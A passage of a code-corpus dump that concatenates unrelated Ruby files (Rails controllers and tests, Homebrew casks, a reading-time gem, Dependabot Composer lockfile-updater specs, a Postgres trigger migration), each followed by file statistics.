uri = "#{uri}/" unless uri =~ %r[/\Z]
uri = URI(uri)
unless uri.absolute?
raise ArgumentError, "Gem sources must be absolute. You provided '#{uri}'."
end
uri
end
end
end
| 25.30303 | 111 | 0.591916 |
ac1120901c4f4305ad5b3f9bffe1d584e4fca83d | 608 | # coding: utf-8
require "erb"
module Reink
module Epub
class TocXhtml
include ERB::Util
def initialize
@items = []
@template = File.open(File.join(File.dirname(__FILE__), "toc.xhtml.erb"), "rb:utf-8") { |file| file.read }
end
attr_accessor :items
def to_s
return ERB.new(@template, nil, "-").result(binding)
end
end
end
end
if $0 == __FILE__
toc_xhtml = Reink::Epub::TocXhtml.new
toc_xhtml.items << {:href => "HREF1", :title => "TITLE1"}
toc_xhtml.items << {:href => "HREF2", :title => "TITLE2"}
puts(toc_xhtml.to_s)
end
| 19.612903 | 114 | 0.595395 |
ffc6b0862b0c6397ae938292228a73437dedef11 | 124 | # frozen_string_literal: true
class PostsController < WulinMaster::ScreenController
controller_for_screen PostScreen
end
| 20.666667 | 53 | 0.854839 |
ab4cabe9a6f0c7e68bee180d967a726b3e976ce6 | 471 | cask 'font-oleo-script' do
version :latest
sha256 :no_check
# github.com/google/fonts was verified as official when first introduced to the cask
url 'https://github.com/google/fonts/trunk/ofl/oleoscript',
using: :svn,
revision: '50',
trust_cert: true
name 'Oleo Script'
homepage 'https://www.google.com/fonts/specimen/Oleo%20Script'
depends_on macos: '>= :sierra'
font 'OleoScript-Bold.ttf'
font 'OleoScript-Regular.ttf'
end
| 26.166667 | 86 | 0.694268 |
b973bd8f1568732f2095c028df0f53ed27c62ba7 | 835 | require 'reading_time/version'
require 'reading_time/core_ext'
require 'reading_time/time'
require 'sanitize'
module ReadingTime
AVG_WORDS_PER_MIN = 200
ACCURACY_IN_SECONDS = 5
def self.word_count(text)
words(text).count
end
def self.parse(text, opts = {})
avg_words_per_min = opts[:words_per_min] || AVG_WORDS_PER_MIN
if opts[:format] and not opts[:format].is_a? String
raise '"format" is not a String'
end
minutes = self.word_count(text).to_f / avg_words_per_min
Time.new(minutes)
end
private
def self.plain_text(text)
# Remove all the HTML
Sanitize.clean(text)
end
def self.trim(minutes)
# TODO: implement this
accuracy = opts[:accuracy] || ACCURACY_IN_SECONDS
end
def self.words(text)
self.plain_text(text).split
end
end
| 18.977273 | 65 | 0.682635 |
26243ff35bc75147ceda1eb8e6b59da74680c490 | 1,417 | require 'test_helper'
class FollowingTest < ActionDispatch::IntegrationTest
def setup
@user = users(:samrood)
log_in_as(@user)
@other = users(:micheal)
end
test 'following page' do
get following_user_path(@user)
assert_not @user.following.empty?
assert_match @user.following.count.to_s, response.body
@user.following.each do |user|
assert_select 'a[href=?]', user_path(user)
end
end
test 'followers page' do
get followers_user_path(@user)
assert_not @user.followers.empty?
assert_match @user.followers.count.to_s, response.body
@user.followers.each do |user|
assert_select 'a[href=?]', user_path(user)
end
end
test 'should follow a user the standard way' do
assert_difference '@user.following.count', 1 do
post relationships_path, params: { followed_id: @other.id }
end
end
test 'should follow a user with Ajax' do
assert_difference '@user.following.count', 1 do
post relationships_path, params: { followed_id: @other.id }, xhr: true
end
end
test 'should unfollow a user the standard way' do
assert_difference '@user.following.count', -1 do
delete relationship_path(relationships(:one))
end
end
test 'should unfollow a user with Ajax' do
assert_difference '@user.following.count', -1 do
delete relationship_path(relationships(:one)), xhr: true
end
end
end
| 26.240741 | 76 | 0.693719 |
1dabaabc72b5102309e92608157def4def303a96 | 3,760 | require 'messages/deployments_list_message'
require 'messages/deployment_create_message'
require 'messages/deployment_update_message'
require 'fetchers/deployment_list_fetcher'
require 'presenters/v3/deployment_presenter'
require 'actions/deployment_create'
require 'actions/deployment_update'
require 'actions/deployment_cancel'
class DeploymentsController < ApplicationController
def index
message = DeploymentsListMessage.from_params(query_params)
invalid_param!(message.errors.full_messages) unless message.valid?
deployment_list_fetcher = DeploymentListFetcher.new(message: message)
dataset = if permission_queryer.can_read_globally?
deployment_list_fetcher.fetch_all
else
deployment_list_fetcher.fetch_for_spaces(space_guids: permission_queryer.readable_space_guids)
end
render status: :ok, json: Presenters::V3::PaginatedListPresenter.new(
presenter: Presenters::V3::DeploymentPresenter,
paginated_result: SequelPaginator.new.get_page(dataset, message.try(:pagination_options)),
path: '/v3/deployments',
message: message
)
end
def create
deployments_not_enabled! if Config.config.get(:temporary_disable_deployments)
message = DeploymentCreateMessage.new(hashed_params[:body])
unprocessable!(message.errors.full_messages) unless message.valid?
app = AppModel.find(guid: message.app_guid)
unprocessable!('Unable to use app. Ensure that the app exists and you have access to it.') unless app && permission_queryer.can_write_to_space?(app.space.guid)
unprocessable!('Cannot create deployment from a revision for an app without revisions enabled') if message.revision_guid && !app.revisions_enabled
begin
deployment = DeploymentCreate.create(app: app, user_audit_info: user_audit_info, message: message)
logger.info("Created deployment #{deployment.guid} for app #{app.guid}")
rescue DeploymentCreate::Error => e
unprocessable!(e.message)
end
render status: :created, json: Presenters::V3::DeploymentPresenter.new(deployment)
end
def update
deployment = DeploymentModel.find(guid: hashed_params[:guid])
resource_not_found!(:deployment) unless deployment &&
permission_queryer.can_read_from_space?(deployment.app.space.guid, deployment.app.space.organization.guid)
unauthorized! unless permission_queryer.can_write_to_space?(deployment.app.space.guid)
message = VCAP::CloudController::DeploymentUpdateMessage.new(hashed_params[:body])
unprocessable!(message.errors.full_messages) unless message.valid?
deployment = VCAP::CloudController::DeploymentUpdate.update(deployment, message)
render status: :ok, json: Presenters::V3::DeploymentPresenter.new(deployment)
end
def show
deployment = DeploymentModel.find(guid: hashed_params[:guid])
resource_not_found!(:deployment) unless deployment &&
permission_queryer.can_read_from_space?(deployment.app.space.guid, deployment.app.space.organization.guid)
render status: :ok, json: Presenters::V3::DeploymentPresenter.new(deployment)
end
def cancel
deployment = DeploymentModel.find(guid: hashed_params[:guid])
resource_not_found!(:deployment) unless deployment && permission_queryer.can_write_to_space?(deployment.app.space_guid)
begin
DeploymentCancel.cancel(deployment: deployment, user_audit_info: user_audit_info)
logger.info("Canceled deployment #{deployment.guid} for app #{deployment.app_guid}")
rescue DeploymentCancel::Error => e
unprocessable!(e.message)
end
head :ok
end
private
def deployments_not_enabled!
raise CloudController::Errors::ApiError.new_from_details('DeploymentsDisabled')
end
end
| 40.430108 | 163 | 0.767021 |
6213f9ba434761fb0f2ee4058f3cc310e7385eac | 1,032 | # frozen_string_literal: true
require 'rails_helper'
RSpec.describe Shared::Utils::Normalizer do
subject(:normalizer) { described_class.new }
describe '#normalize_url' do
it 'converts nil-value to empty string' do
expect(normalizer.normalize_url(nil)).to eq('')
end
it 'removes spaces from the url' do
expect(normalizer.normalize_url(' https://example.com/123 ')).to eq('https://example.com/123')
end
end
describe '#remove_extra_whitespaces' do
it 'converts nil-value to empty string' do
expect(normalizer.remove_extra_whitespaces(nil)).to eq('')
end
it 'removes newlines' do
expect(normalizer.remove_extra_whitespaces("My\nNew\nPost")).to eq('MyNewPost')
end
it 'replaces extra spaces with one space' do
expect(normalizer.remove_extra_whitespaces('My New Post')).to eq('My New Post')
end
it 'removes leading and ending spaces' do
expect(normalizer.remove_extra_whitespaces(' My New Post ')).to eq('My New Post')
end
end
end
| 28.666667 | 100 | 0.696705 |
5d6b1a5320b2072fd11dd7b30e46bdc2bd625e2f | 1,224 | # frozen_string_literal: true
require 'erb'
require_relative 'template'
# All things required to generate the ModelPages
class ModelPages
def initialize(works)
@works = works
end
def generate(template)
models.each_with_object({}) do |model, collection|
template_values = {
title: model,
thumbnails: thumbnails(model),
navigation: navigation(model)
}
filename = Template.sanitize_link(model) + '.html'
collection[filename] = Template.generate(template, template_values)
collection
end
end
def models
@works.map { |work| work.css('model').text }.uniq.reject(&:empty?)
end
def thumbnails(model)
@works.select { |work| work.css('model').text == model }.map do |work|
{
src: work.css('urls url[type="small"]').text,
alt: work.css('filename').text
}
end
end
def navigation(model)
home_link = [{ href: 'index.html', text: 'Home' }]
make_links = @works.select { |work| work.css('model').text == model }.map do |work|
{
href: Template.sanitize_link(work.css('make').text) + '.html',
text: work.css('make').text
}
end
home_link + make_links.uniq
end
end
| 23.09434 | 87 | 0.623366 |
7944c5e0a016cc69b73206a0c1456a4a2691985c | 1,067 | # 在数据库中的配置信息
# 这里有存放首页,Wiki 等页面 HTML
# 使用方法
# SiteConfig.foo
# SiteConfig.foo = "asdkglaksdg"
class SiteConfig
include Mongoid::Document
field :key
field :value
index key: 1
validates :key, presence: true, uniqueness: true
def self.method_missing(method, *args)
method_name = method.to_s
super(method, *args)
rescue NoMethodError
if method_name =~ /=$/
var_name = method_name.delete('=')
value = args.first.to_s
# save
if (item = find_by_key(var_name))
item.update_attribute(:value, value)
else
SiteConfig.create(key: var_name, value: value)
end
else
Rails.cache.fetch("site_config:#{method}") do
if (item = find_by_key(method))
item.value
end
end
end
end
after_save :update_cache
def update_cache
Rails.cache.write("site_config:#{key}", value)
end
def self.find_by_key(key)
where(key: key.to_s).first
end
def self.save_default(key, value)
create(key: key, value: value.to_s) unless find_by_key(key)
end
end
| 20.921569 | 63 | 0.651359 |
ff2a813973451ae17994a6d4b48e84a2971c0c8a | 908 | cask 'gitkraken' do
version '0.8.3'
sha256 'af48b91889f6473ad2a8b5a17ee9badf69526a145c91d3da7640bfa257ecc6aa'
url "http://release.gitkraken.com/darwin/v#{version}.zip"
appcast 'https://release.gitkraken.com/darwin/RELEASES',
checkpoint: '0ab458302fdfe2cdc8f005a0eb3e196c365427376ba75022f66ce9b229505d97'
name 'GitKraken'
homepage 'http://www.gitkraken.com/'
license :gratis
auto_updates true
app 'GitKraken.app'
zap delete: [
'~/Library/Application Support/com.axosoft.gitkraken.ShipIt',
'~/Library/Application Support/GitKraken',
'~/Library/Caches/GitKraken',
'~/Library/Caches/com.axosoft.gitkraken',
'~/Library/Preferences/com.axosoft.gitkraken.plist',
'~/Library/Saved Application State/com.axosoft.gitkraken.savedState',
'~/.gitkraken',
]
end
| 34.923077 | 88 | 0.659692 |
337764fc61e346d356e7309835cf39c23e3af826 | 2,287 | class GenTrackerHistoryDeleteTrigger < ActiveRecord::Migration
def change
reversible do |dir|
dir.up do
execute <<EOF
DROP TRIGGER IF EXISTS tracker_record_delete ON tracker_history;
DROP FUNCTION IF EXISTS handle_delete();
CREATE FUNCTION handle_delete() RETURNS trigger
LANGUAGE plpgsql
AS $$
DECLARE
latest_tracker tracker_history%ROWTYPE;
BEGIN
-- Find the most recent remaining item in tracker_history for the master/protocol pair,
-- now that the target record has been deleted.
-- tracker_id is the foreign key onto the trackers table master/protocol record.
SELECT * INTO latest_tracker
FROM tracker_history
WHERE tracker_id = OLD.tracker_id
ORDER BY event_date DESC NULLS last, updated_at DESC NULLS last LIMIT 1;
IF NOT FOUND THEN
-- No record was found in tracker_history for the master/protocol pair.
-- Therefore there should be no corresponding trackers record either. Delete it.
DELETE FROM trackers WHERE trackers.id = OLD.tracker_id;
ELSE
-- A record was found in tracker_history. Since it is the latest one for the master/protocol pair,
-- just go ahead and update the corresponding record in trackers.
UPDATE trackers
SET
event_date = latest_tracker.event_date,
sub_process_id = latest_tracker.sub_process_id,
protocol_event_id = latest_tracker.protocol_event_id,
item_id = latest_tracker.item_id,
item_type = latest_tracker.item_type,
updated_at = latest_tracker.updated_at,
notes = latest_tracker.notes,
user_id = latest_tracker.user_id
WHERE trackers.id = OLD.tracker_id;
END IF;
RETURN OLD;
END
$$;
-- For every row that is deleted, call the function
CREATE TRIGGER tracker_record_delete AFTER DELETE ON tracker_history FOR EACH ROW EXECUTE PROCEDURE handle_delete();
EOF
end
dir.down do
execute <<EOF
DROP TRIGGER IF EXISTS tracker_record_delete ON tracker_history;
DROP FUNCTION IF EXISTS handle_delete();
EOF
end
end
end
end
| 30.092105 | 118 | 0.661128 |
ac3164a4ff11cffac6f9bc4c708df7a3a01a5e61 | 212 | class TestRoutingController < ApplicationController
def routed_action
render_class_and_action
end
def test_named_routes_from_plugin
render :text => plugin_route_path(:action => "index")
end
end | 23.555556 | 57 | 0.778302 |
61cc5724ad96727e398c2c3f5c842eee0fa1a4dd | 24,322 | # frozen_string_literal: true
require "spec_helper"
require "dependabot/dependency"
require "dependabot/dependency_file"
require "dependabot/composer/file_updater/lockfile_updater"
RSpec.describe Dependabot::Composer::FileUpdater::LockfileUpdater do
let(:updater) do
described_class.new(
dependency_files: files,
dependencies: [dependency],
credentials: credentials
)
end
let(:credentials) do
[{
"type" => "git_source",
"host" => "github.com",
"username" => "x-access-token",
"password" => "token"
}]
end
let(:files) { [composer_json, lockfile] }
let(:composer_json) do
Dependabot::DependencyFile.new(
name: "composer.json",
content: fixture("composer_files", manifest_fixture_name)
)
end
let(:lockfile) do
Dependabot::DependencyFile.new(
name: "composer.lock",
content: fixture("lockfiles", lockfile_fixture_name)
)
end
let(:manifest_fixture_name) { "exact_version" }
let(:lockfile_fixture_name) { "exact_version" }
let(:dependency) do
Dependabot::Dependency.new(
name: "monolog/monolog",
version: "1.22.1",
requirements: requirements,
previous_version: "1.0.1",
previous_requirements: previous_requirements,
package_manager: "composer"
)
end
let(:requirements) do
[{
file: "composer.json",
requirement: "1.22.1",
groups: [],
source: nil
}]
end
let(:previous_requirements) do
[{
file: "composer.json",
requirement: "1.0.1",
groups: [],
source: nil
}]
end
let(:tmp_path) { Dependabot::SharedHelpers::BUMP_TMP_DIR_PATH }
before { Dir.mkdir(tmp_path) unless Dir.exist?(tmp_path) }
describe "the updated lockfile" do
subject(:updated_lockfile_content) do
raw = updater.updated_lockfile_content
JSON.parse(raw).to_json
end
it "has details of the updated item" do
expect(updated_lockfile_content).to include("\"version\":\"1.22.1\"")
end
it { is_expected.to include "\"prefer-stable\":false" }
context "when an old version of PHP is specified" do
context "as a platform requirement" do
let(:manifest_fixture_name) { "old_php_platform" }
let(:dependency) do
Dependabot::Dependency.new(
name: "illuminate/support",
version: "5.4.36",
requirements: [{
file: "composer.json",
requirement: "^5.2.0",
groups: ["runtime"],
source: nil
}],
previous_version: "5.2.7",
previous_requirements: [{
file: "composer.json",
requirement: "^5.2.0",
groups: ["runtime"],
source: nil
}],
package_manager: "composer"
)
end
it "has details of the updated item" do
expect(updated_lockfile_content).to include("\"version\":\"v5.4.36\"")
end
end
context "with an application using a >= PHP constraint" do
let(:manifest_fixture_name) { "php_specified" }
let(:dependency) do
Dependabot::Dependency.new(
name: "phpdocumentor/reflection-docblock",
version: "4.3.1",
requirements: [{
file: "composer.json",
requirement: "4.3.1",
groups: ["runtime"],
source: nil
}],
previous_version: "2.0.4",
previous_requirements: [{
file: "composer.json",
requirement: "2.0.4",
groups: ["runtime"],
source: nil
}],
package_manager: "composer"
)
end
it "has details of the updated item" do
expect(updated_lockfile_content).to include("\"version\":\"4.3.1\"")
end
end
context "with an application using a ^ PHP constraint" do
let(:manifest_fixture_name) { "php_specified_min_invalid" }
let(:dependency) do
Dependabot::Dependency.new(
name: "phpdocumentor/reflection-docblock",
version: "3.3.2",
requirements: [{
file: "composer.json",
requirement: "3.3.2",
groups: ["runtime"],
source: nil
}],
previous_version: "2.0.4",
previous_requirements: [{
file: "composer.json",
requirement: "2.0.4",
groups: ["runtime"],
source: nil
}],
package_manager: "composer"
)
end
it "has details of the updated item" do
expect(updated_lockfile_content).to include("\"version\":\"3.3.2\"")
end
end
context "and an extension is specified that we don't have" do
let(:manifest_fixture_name) { "missing_extension" }
let(:lockfile_fixture_name) { "missing_extension" }
let(:dependency) do
Dependabot::Dependency.new(
name: "illuminate/support",
version: "5.4.36",
requirements: [{
file: "composer.json",
requirement: "^5.2.0",
groups: ["runtime"],
source: nil
}],
previous_version: "5.2.7",
previous_requirements: [{
file: "composer.json",
requirement: "^5.2.0",
groups: ["runtime"],
source: nil
}],
package_manager: "composer"
)
end
it "has details of the updated item" do
expect(updated_lockfile_content).to include("\"version\":\"v5.4.36\"")
expect(updated_lockfile_content).
to include("\"platform-overrides\":{\"php\":\"5.6.4\"}")
end
end
end
context "with a plugin that would cause errors" do
let(:manifest_fixture_name) { "plugin" }
let(:lockfile_fixture_name) { "plugin" }
it "has details of the updated item" do
expect(updated_lockfile_content).to include("\"version\":\"1.22.1\"")
end
end
context "with a plugin that conflicts with the current composer version" do
let(:manifest_fixture_name) { "outdated_flex" }
let(:lockfile_fixture_name) { "outdated_flex" }
let(:dependency) do
Dependabot::Dependency.new(
name: "symphony/lock",
version: "4.1.3",
requirements: [{
file: "composer.json",
requirement: "^4.1",
groups: ["runtime"],
source: nil
}],
previous_version: "4.1.1",
previous_requirements: [{
file: "composer.json",
requirement: "^4.1",
groups: ["runtime"],
source: nil
}],
package_manager: "composer"
)
end
it "raises a helpful error" do
expect { updated_lockfile_content }.to raise_error do |error|
expect(error.message).to start_with("One of your Composer plugins")
expect(error).to be_a Dependabot::DependencyFileNotResolvable
end
end
end
context "that requires an environment variable" do
let(:manifest_fixture_name) { "env_variable" }
context "that hasn't been provided" do
it "raises a MissingEnvironmentVariable error" do
expect { updated_lockfile_content }.to raise_error do |error|
expect(error).to be_a(Dependabot::MissingEnvironmentVariable)
expect(error.environment_variable).to eq("ACF_PRO_KEY")
end
end
end
context "that has been provided" do
let(:updater) do
described_class.new(
dependency_files: files,
dependencies: [dependency],
credentials: [{
"type" => "git_source",
"host" => "github.com",
"username" => "x-access-token",
"password" => "token"
}, {
"type" => "php_environment_variable",
"env-key" => "ACF_PRO_KEY",
"env-value" => "example_key"
}]
)
end
it "runs just fine (we get a 404 here because our key is wrong)" do
expect { updated_lockfile_content }.to raise_error do |error|
expect(error).to be_a(Dependabot::DependencyFileNotResolvable)
expect(error.message).to include("404 Not Found")
end
end
end
end
context "with a path source" do
let(:files) { [composer_json, lockfile, path_dep] }
let(:manifest_fixture_name) { "path_source" }
let(:lockfile_fixture_name) { "path_source" }
let(:path_dep) do
Dependabot::DependencyFile.new(
name: "components/path_dep/composer.json",
content: fixture("composer_files", "path_dep")
)
end
let(:dependency) do
Dependabot::Dependency.new(
name: "monolog/monolog",
version: "1.22.1",
requirements: [{
file: "composer.json",
requirement: "1.22.*",
groups: [],
source: nil
}],
previous_version: "1.0.1",
previous_requirements: [{
file: "composer.json",
requirement: "1.0.*",
groups: [],
source: nil
}],
package_manager: "composer"
)
end
it "has details of the updated item" do
expect(updated_lockfile_content).to include("\"version\":\"1.22.1\"")
end
end
context "when the new version is covered by the old requirements" do
let(:manifest_fixture_name) { "minor_version" }
let(:lockfile_fixture_name) { "covered_version" }
let(:dependency) do
Dependabot::Dependency.new(
name: "monolog/monolog",
version: "1.0.2",
requirements: [{
file: "composer.json",
requirement: "1.0.*",
groups: [],
source: nil
}],
previous_version: "1.0.0",
previous_requirements: [{
file: "composer.json",
requirement: "1.0.*",
groups: [],
source: nil
}],
package_manager: "composer"
)
end
it "has details of the updated item" do
updated_dep = JSON.parse(updated_lockfile_content).
fetch("packages").
find { |p| p["name"] == "monolog/monolog" }
expect(updated_dep.fetch("version")).to eq("1.0.2")
end
end
context "when the dependency is a development dependency" do
let(:manifest_fixture_name) { "development_dependencies" }
let(:lockfile_fixture_name) { "development_dependencies" }
it "has details of the updated item" do
expect(updated_lockfile_content).to include("\"version\":\"1.22.1\"")
end
end
context "when the dependency is a subdependency" do
let(:manifest_fixture_name) { "subdependency_update_required" }
let(:lockfile_fixture_name) { "subdependency_update_required" }
let(:dependency) do
Dependabot::Dependency.new(
name: "illuminate/contracts",
version: "5.2.45",
previous_version: "5.2.37",
requirements: [],
previous_requirements: [],
package_manager: "composer"
)
end
it "has details of the updated item" do
expect(updated_lockfile_content).to include("\"version\":\"v5.2.45\"")
expect(updated_lockfile_content).
to include("22bde7b048a33c702d9737fc1446234fff9b1363")
end
context "and is limited by a library's PHP version" do
let(:manifest_fixture_name) { "php_specified_in_library" }
let(:lockfile_fixture_name) { "php_specified_in_library" }
let(:dependency) do
Dependabot::Dependency.new(
name: "doctrine/inflector",
version: "1.1.0",
previous_version: "1.0",
requirements: [],
previous_requirements: [],
package_manager: "composer"
)
end
it "has details of the updated item" do
expect(updated_lockfile_content).to include("\"version\":\"v1.1.0\"")
expect(updated_lockfile_content).
to include("90b2128806bfde671b6952ab8bea493942c1fdae")
end
end
end
context "with a private registry" do
let(:manifest_fixture_name) { "private_registry" }
let(:lockfile_fixture_name) { "private_registry" }
before { `composer clear-cache --quiet` }
let(:dependency) do
Dependabot::Dependency.new(
name: "dependabot/dummy-pkg-a",
version: "2.2.0",
previous_version: "2.1.0",
requirements: [{
file: "composer.json",
requirement: "*",
groups: [],
source: nil
}],
previous_requirements: [{
file: "composer.json",
requirement: "*",
groups: [],
source: nil
}],
package_manager: "composer"
)
end
context "with good credentials" do
let(:credentials) do
[{
"type" => "git_source",
"host" => "github.com",
"username" => "x-access-token",
"password" => "token"
}, {
"type" => "composer_repository",
"registry" => "php.fury.io",
"username" => "yFu9PBmw1HxNjFB818TW", # Throwaway account
"password" => ""
}]
end
it "has details of the updated item" do
expect(updated_lockfile_content).to include("\"version\":\"2.2.0\"")
end
end
end
context "with a laravel nova" do
let(:manifest_fixture_name) { "laravel_nova" }
let(:lockfile_fixture_name) { "laravel_nova" }
before { `composer clear-cache --quiet` }
let(:dependency) do
Dependabot::Dependency.new(
name: "laravel/nova",
version: "2.0.9",
previous_version: "2.0.7",
requirements: [{
file: "composer.json",
requirement: "*",
groups: [],
source: nil
}],
previous_requirements: [{
file: "composer.json",
requirement: "*",
groups: [],
source: nil
}],
package_manager: "composer"
)
end
context "with bad credentials" do
let(:credentials) do
[{
"type" => "git_source",
"host" => "github.com",
"username" => "x-access-token",
"password" => "token"
}, {
"type" => "composer_repository",
"registry" => "nova.laravel.com",
"username" => "username",
"password" => "password"
}]
end
it "raises a helpful errors" do
expect { updated_lockfile_content }.to raise_error do |error|
expect(error).to be_a Dependabot::PrivateSourceAuthenticationFailure
expect(error.source).to eq("nova.laravel.com")
end
end
end
end
context "when another dependency has git source with a bad reference" do
let(:lockfile_fixture_name) { "git_source_bad_ref" }
let(:manifest_fixture_name) { "git_source_bad_ref" }
let(:dependency) do
Dependabot::Dependency.new(
name: "symfony/polyfill-mbstring",
version: "1.6.0",
requirements: [{
file: "composer.json",
requirement: "1.6.0",
groups: [],
source: nil
}],
previous_version: "1.0.1",
previous_requirements: [{
file: "composer.json",
requirement: "1.0.1",
groups: [],
source: nil
}],
package_manager: "composer"
)
end
it "raises a helpful errors" do
expect { updated_lockfile_content }.to raise_error do |error|
expect(error).to be_a Dependabot::GitDependencyReferenceNotFound
expect(error.dependency).to eq("monolog/monolog")
end
end
end
context "when another dependency has git source with a bad commit" do
let(:manifest_fixture_name) { "git_source" }
let(:lockfile_fixture_name) { "git_source_bad_commit" }
let(:dependency) do
Dependabot::Dependency.new(
name: "symfony/polyfill-mbstring",
version: "1.6.0",
requirements: [{
file: "composer.json",
requirement: "1.6.0",
groups: [],
source: nil
}],
previous_version: "1.0.1",
previous_requirements: [{
file: "composer.json",
requirement: "1.0.1",
groups: [],
source: nil
}],
package_manager: "composer"
)
end
it "updates the lockfile correctly" do
# Updates the commit SHA of the git dependency (because we have to)
expect(updated_lockfile_content).
to include('"303b8a83c87d5c6d749926cf02620465a5dcd0f2"')
expect(updated_lockfile_content).to include('"version":"dev-example"')
# Updates the specified dependency
expect(updated_lockfile_content).
to include('"2ec8b39c38cb16674bbf3fea2b6ce5bf117e1296"')
expect(updated_lockfile_content).to include('"version":"v1.6.0"')
end
end
context "with a git source using no-api" do
let(:manifest_fixture_name) { "git_source_no_api" }
let(:lockfile_fixture_name) { "git_source_no_api" }
let(:dependency) do
Dependabot::Dependency.new(
name: "symfony/polyfill-mbstring",
version: "1.6.0",
requirements: [{
file: "composer.json",
requirement: "1.6.0",
groups: [],
source: nil
}],
previous_version: "1.0.1",
previous_requirements: [{
file: "composer.json",
requirement: "1.0.1",
groups: [],
source: nil
}],
package_manager: "composer"
)
end
it "updates the lockfile correctly" do
# Doesn't update the commit SHA of the git dependency
expect(updated_lockfile_content).
to include('"5267b03b1e4861c4657ede17a88f13ef479db482"')
expect(updated_lockfile_content).
to_not include('"303b8a83c87d5c6d749926cf02620465a5dcd0f2"')
expect(updated_lockfile_content).to include('"version":"dev-example"')
# Does update the specified dependency
expect(updated_lockfile_content).
to include('"2ec8b39c38cb16674bbf3fea2b6ce5bf117e1296"')
expect(updated_lockfile_content).to include('"version":"v1.6.0"')
# Cleans up the additions we made
expect(updated_lockfile_content).to_not include('"support": {')
end
end
context "when another dependency has an unreachable git source" do
let(:lockfile_fixture_name) { "git_source_unreachable" }
let(:manifest_fixture_name) { "git_source_unreachable" }
let(:dependency) do
Dependabot::Dependency.new(
name: "symfony/polyfill-mbstring",
version: "1.6.0",
requirements: [{
file: "composer.json",
requirement: "1.6.0",
groups: [],
source: nil
}],
previous_version: "1.0.1",
previous_requirements: [{
file: "composer.json",
requirement: "1.0.1",
groups: [],
source: nil
}],
package_manager: "composer"
)
end
it "raises a helpful errors" do
expect { updated_lockfile_content }.to raise_error do |error|
expect(error).to be_a Dependabot::GitDependenciesNotReachable
expect(error.dependency_urls).
to eq(["https://github.com/no-exist-sorry/monolog"])
end
end
end
context "when there are patches" do
let(:manifest_fixture_name) { "patches" }
let(:lockfile_fixture_name) { "patches" }
let(:dependency) do
Dependabot::Dependency.new(
name: "ehime/hello-world",
version: "1.0.5",
requirements: [{
file: "composer.json",
requirement: "1.0.5",
groups: [],
source: nil
}],
previous_version: "1.0.4",
previous_requirements: [{
file: "composer.json",
requirement: "1.0.4",
groups: [],
source: nil
}],
package_manager: "composer"
)
end
it "doesn't strip the patches" do
updated_dep = JSON.parse(updated_lockfile_content).
fetch("packages").
find { |p| p["name"] == "ehime/hello-world" }
expect(updated_dep.dig("extra", "patches_applied")).
to include("[PATCH] markdown modified")
end
end
context "regression spec for media-organizer" do
let(:manifest_fixture_name) { "media_organizer" }
let(:lockfile_fixture_name) { "media_organizer" }
let(:dependency) do
Dependabot::Dependency.new(
name: "monolog/monolog",
version: "1.23.0",
requirements: [{
file: "composer.json",
requirement: "~1.0",
groups: [],
source: nil
}],
previous_version: "1.20.0",
previous_requirements: [{
file: "composer.json",
requirement: "~1.0",
groups: [],
source: nil
}],
package_manager: "composer"
)
end
it "has details of the updated item" do
updated_dep = JSON.parse(updated_lockfile_content).
fetch("packages-dev").
find { |p| p["name"] == "monolog/monolog" }
expect(Gem::Version.new(updated_dep.fetch("version"))).
to be >= Gem::Version.new("1.23.0")
end
end
context "when a subdependency needs to be updated" do
let(:manifest_fixture_name) { "subdependency_update_required" }
let(:lockfile_fixture_name) { "subdependency_update_required" }
let(:dependency) do
Dependabot::Dependency.new(
name: "illuminate/support",
version: "5.6.23",
requirements: [{
file: "composer.json",
requirement: "^5.6.23",
groups: ["runtime"],
source: nil
}],
previous_version: "5.2.0",
previous_requirements: [{
file: "composer.json",
requirement: "^5.2.0",
groups: ["runtime"],
source: nil
}],
package_manager: "composer"
)
end
it "has details of the updated item" do
expect(updated_lockfile_content).to include("\"version\":\"v5.6.23\"")
expect(updated_lockfile_content).to include("ba383d0a3bf6aa0b7a1307fdc")
end
end
context "updating to a specific version when reqs would allow higher" do
let(:manifest_fixture_name) { "subdependency_update_required" }
let(:lockfile_fixture_name) { "subdependency_update_required" }
let(:dependency) do
Dependabot::Dependency.new(
name: "illuminate/support",
version: "5.3.0",
requirements: [{
file: "composer.json",
requirement: "^5.2.0",
groups: ["runtime"],
source: nil
}],
previous_version: "5.2.0",
previous_requirements: [{
file: "composer.json",
requirement: "^5.2.0",
groups: ["runtime"],
source: nil
}],
package_manager: "composer"
)
end
it "has details of the updated item" do
expect(updated_lockfile_content).to include("\"version\":\"v5.3.0\"")
expect(updated_lockfile_content).to include("e244eda135819216ac3044146")
end
end
end
end
| 31.022959 | 80 | 0.546994 |
1c7630094e50525fee31f53460136211b2b3174e | 518 | cask 'zeplin' do
version '2.5,717'
sha256 '39c4d60e605a4a5ae72d72ccc308bfefec4333e780b4e8d16c25d3d9f03422ed'
url 'https://api.zeplin.io/urls/download-mac'
appcast 'https://rink.hockeyapp.net/api/2/apps/8926efffe734b6d303d09f41d90c34fc'
name 'Zeplin'
homepage 'https://zeplin.io/'
auto_updates true
app 'Zeplin.app'
zap trash: [
'~/Library/Logs/Zeplin',
'~/Library/Caches/io.zeplin.osx',
'~/Library/Preferences/io.zeplin.osx.plist',
]
end
| 25.9 | 82 | 0.658301 |
e8409c787f0851417b338e046ebabed835a67ed9 | 441 | #! /usr/bin/ruby
system("rm -rf api-doc")
File::open("tkrzw-doc.rb") { |ifile|
File::open("tkrzw.rb", "w") { |ofile|
ifile.each { |line|
line = line.chomp
line = line.sub(/# +@param +(\w+) +/, '# - <b>@param <i>\\1</i></b> ')
line = line.sub(/# +@(\w+) +/, '# - <b>@\\1</b> ')
ofile.printf("%s\n", line)
}
}
}
system('rdoc --title "Tkrzw" --main tkrzw.rb -o api-doc tkrzw.rb')
system("rm -f tkrzw.rb")
| 24.5 | 76 | 0.489796 |
914807b01c7a09a42c09ef1f4c56aecf2bb282cd | 186 | # frozen_string_literal: true
class AddRightsToUser < ActiveRecord::Migration[6.0]
def change
add_column :users, :rights, :string, array: true, null: false, default: []
end
end
| 23.25 | 78 | 0.725806 |
3890546875fe215b737944bce9426ff71b7e5507 | 19,881 | require 'spec_helper'
describe 'openstack::all' do
# minimum set of default parameters
let :params do
{
:public_address => '10.0.0.1',
:public_interface => 'eth0',
:admin_email => 'some_user@some_fake_email_address.foo',
:admin_password => 'ChangeMe',
:rabbit_password => 'rabbit_pw',
:keystone_db_password => 'keystone_pass',
:keystone_admin_token => 'keystone_admin_token',
:glance_db_password => 'glance_pass',
:glance_user_password => 'glance_pass',
:nova_db_password => 'nova_pass',
:nova_user_password => 'nova_pass',
:secret_key => 'secret_key',
